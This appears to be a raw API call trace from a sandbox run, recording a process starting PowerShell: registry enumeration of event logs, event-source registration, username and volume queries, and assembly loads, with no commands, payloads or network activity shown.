	[0784.669] RegCloseKey (hKey=0x364) returned 0x0
	[0784.669] RegCloseKey (hKey=0x384) returned 0x0
	[0784.670] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ceb8 | out: phkResult=0x14ceb8*=0x384) returned 0x0
	[0784.670] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ce2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ce2c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce28*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.671] CoTaskMemFree (pv=0x0) 
	[0784.671] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.671] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.671] CoTaskMemFree (pv=0x2564a0) 
	[0784.671] CoTaskMemFree (pv=0x0) 
	[0784.671] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.671] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.671] CoTaskMemFree (pv=0x2564a0) 
	[0784.671] CoTaskMemFree (pv=0x0) 
	[0784.671] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.671] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.671] CoTaskMemFree (pv=0x2564a0) 
	[0784.671] CoTaskMemFree (pv=0x0) 
	[0784.671] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.671] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.672] CoTaskMemFree (pv=0x2564a0) 
	[0784.672] CoTaskMemFree (pv=0x0) 
	[0784.672] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.672] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.672] CoTaskMemFree (pv=0x2564a0) 
	[0784.672] CoTaskMemFree (pv=0x0) 
	[0784.672] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.672] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.672] CoTaskMemFree (pv=0x2564a0) 
	[0784.672] CoTaskMemFree (pv=0x0) 
	[0784.672] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.672] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.672] CoTaskMemFree (pv=0x2564a0) 
	[0784.672] CoTaskMemFree (pv=0x0) 
	[0784.672] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.672] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.673] CoTaskMemFree (pv=0x2564a0) 
	[0784.673] CoTaskMemFree (pv=0x0) 
	[0784.673] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.673] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x2564a0, lpcchName=0x14ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.673] CoTaskMemFree (pv=0x2564a0) 
	[0784.673] CoTaskMemFree (pv=0x0) 
	[0784.673] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x364) returned 0x0
	[0784.673] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.673] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x388) returned 0x0
	[0784.673] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.674] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x38c) returned 0x0
	[0784.674] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.674] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x390) returned 0x0
	[0784.674] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.674] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x394) returned 0x0
	[0784.674] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.675] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x398) returned 0x0
	[0784.675] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.675] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x39c) returned 0x0
	[0784.675] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.675] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x3a0) returned 0x0
	[0784.675] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x0) returned 0x2
	[0784.675] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x3a4) returned 0x0
	[0784.676] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf18 | out: phkResult=0x14cf18*=0x3a8) returned 0x0
	[0784.676] RegCloseKey (hKey=0x3a8) returned 0x0
	[0784.676] RegCloseKey (hKey=0x384) returned 0x0
	[0784.676] RegCloseKey (hKey=0x3a4) returned 0x0
	[0784.682] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b830008
	[0785.039] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f00c40*="WSMan", lpRawData=0x2f009b0) returned 1
	[0785.048] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0785.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.048] CoTaskMemFree (pv=0x2b14c0) 
	[0785.049] CoTaskMemAlloc (cb=0x804) returned 0x1b764290
	[0785.049] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b764290, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0785.049] CoTaskMemFree (pv=0x1b764290) 
	[0785.049] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0785.049] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0785.050] CoTaskMemFree (pv=0x2564a0) 
	[0785.050] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f06178*="Alias", lpRawData=0x2f05f08) returned 1
	[0785.056] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0785.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.057] CoTaskMemFree (pv=0x2b14c0) 
	[0785.058] CoTaskMemAlloc (cb=0x804) returned 0x1b764290
	[0785.058] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b764290, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0785.058] CoTaskMemFree (pv=0x1b764290) 
	[0785.058] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0785.058] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0785.058] CoTaskMemFree (pv=0x2564a0) 
	[0785.059] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0b770*="Environment", lpRawData=0x2f0b500) returned 1
	[0785.066] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0785.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.067] CoTaskMemFree (pv=0x2b14c0) 
	[0785.067] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0785.067] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0785.067] CoTaskMemFree (pv=0x2b14c0) 
	[0785.067] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0785.067] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0785.067] CoTaskMemFree (pv=0x2b14c0) 
	[0785.068] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0785.068] SetErrorMode (uMode=0x1) returned 0x1
	[0785.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14cf60 | out: lpFileInformation=0x14cf60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.068] SetErrorMode (uMode=0x1) returned 0x1
	[0785.068] GetLogicalDrives () returned 0x4
	[0785.069] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.072] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.072] SetErrorMode (uMode=0x1) returned 0x1
	[0785.072] CoTaskMemAlloc (cb=0x68) returned 0x1b73d150
	[0785.073] CoTaskMemAlloc (cb=0x68) returned 0x1b73db60
	[0785.073] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b73d150, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14cf30, lpMaximumComponentLength=0x14cf2c, lpFileSystemFlags=0x14cf28, lpFileSystemNameBuffer=0x1b73db60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14cf30*=0x9c354b42, lpMaximumComponentLength=0x14cf2c*=0xff, lpFileSystemFlags=0x14cf28*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0785.073] CoTaskMemFree (pv=0x1b73d150) 
	[0785.073] CoTaskMemFree (pv=0x1b73db60) 
	[0785.073] SetErrorMode (uMode=0x1) returned 0x1
	[0785.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.074] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cc70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.074] SetErrorMode (uMode=0x1) returned 0x1
	[0785.074] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14ced0 | out: lpFileInformation=0x14ced0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.074] SetErrorMode (uMode=0x1) returned 0x1
	[0785.074] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cc70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.074] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.075] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.075] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.075] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.075] SetErrorMode (uMode=0x1) returned 0x1
	[0785.075] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cd00 | out: lpFileInformation=0x14cd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.075] SetErrorMode (uMode=0x1) returned 0x1
	[0785.075] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.076] SetErrorMode (uMode=0x1) returned 0x1
	[0785.076] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cd00 | out: lpFileInformation=0x14cd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.076] SetErrorMode (uMode=0x1) returned 0x1
	[0785.076] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.076] SetErrorMode (uMode=0x1) returned 0x1
	[0785.076] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cda0 | out: lpFileInformation=0x14cda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.076] SetErrorMode (uMode=0x1) returned 0x1
	[0785.077] CoTaskMemAlloc (cb=0x804) returned 0x1b764290
	[0785.077] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b764290, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0785.077] CoTaskMemFree (pv=0x1b764290) 
	[0785.077] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0785.077] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0785.077] CoTaskMemFree (pv=0x2564a0) 
	[0785.078] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f12860*="FileSystem", lpRawData=0x2f125f0) returned 1
	[0785.091] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0785.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.091] CoTaskMemFree (pv=0x2b14c0) 
	[0785.091] CoTaskMemAlloc (cb=0x804) returned 0x1b764290
	[0785.091] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b764290, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0785.092] CoTaskMemFree (pv=0x1b764290) 
	[0785.092] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0785.092] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0785.092] CoTaskMemFree (pv=0x2564a0) 
	[0785.092] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f180a0*="Function", lpRawData=0x2f17e30) returned 1
	[0785.102] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0785.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.102] CoTaskMemFree (pv=0x2b14c0) 
	[0785.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.871] CoTaskMemAlloc (cb=0x804) returned 0x1b764290
	[0785.871] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b764290, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0785.871] CoTaskMemFree (pv=0x1b764290) 
	[0785.871] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0785.871] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0785.871] CoTaskMemFree (pv=0x2564a0) 
	[0785.872] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3a8c8*="Registry", lpRawData=0x2f3a658) returned 1
	[0786.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0786.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0786.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0786.094] CoTaskMemAlloc (cb=0x804) returned 0x1b764290
	[0786.094] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b764290, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0786.094] CoTaskMemFree (pv=0x1b764290) 
	[0786.095] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0786.095] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0786.099] CoTaskMemFree (pv=0x2564a0) 
	[0786.099] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3fce0*="Variable", lpRawData=0x2f3fa70) returned 1
	[0786.156] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0786.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.156] CoTaskMemFree (pv=0x2b14c0) 
	[0786.159] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0786.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.159] CoTaskMemFree (pv=0x2b14c0) 
	[0786.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0786.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0786.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0786.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0789.695] CoTaskMemAlloc (cb=0x804) returned 0x1b771630
